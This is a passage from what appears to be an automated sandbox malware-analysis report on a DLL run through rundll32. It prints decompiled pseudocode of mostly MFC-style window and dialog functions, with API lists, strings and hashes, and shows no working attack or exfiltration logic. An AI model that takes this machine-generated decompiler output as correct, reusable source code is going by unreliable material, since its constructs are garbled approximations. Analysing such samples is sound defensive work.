						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32 ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 10012434

Strings

AfxFrameOrView80s, xrefs: 100124FA
@, xrefs: 10012540
@, xrefs: 100125D9
AfxMDIFrame80s, xrefs: 100124D5

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32(?,00000080), ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0xcbf72908
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0xcbf72908
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

B, xrefs: 1000D88C
DISPLAY, xrefs: 1000D8E9

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0xcbf72908
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
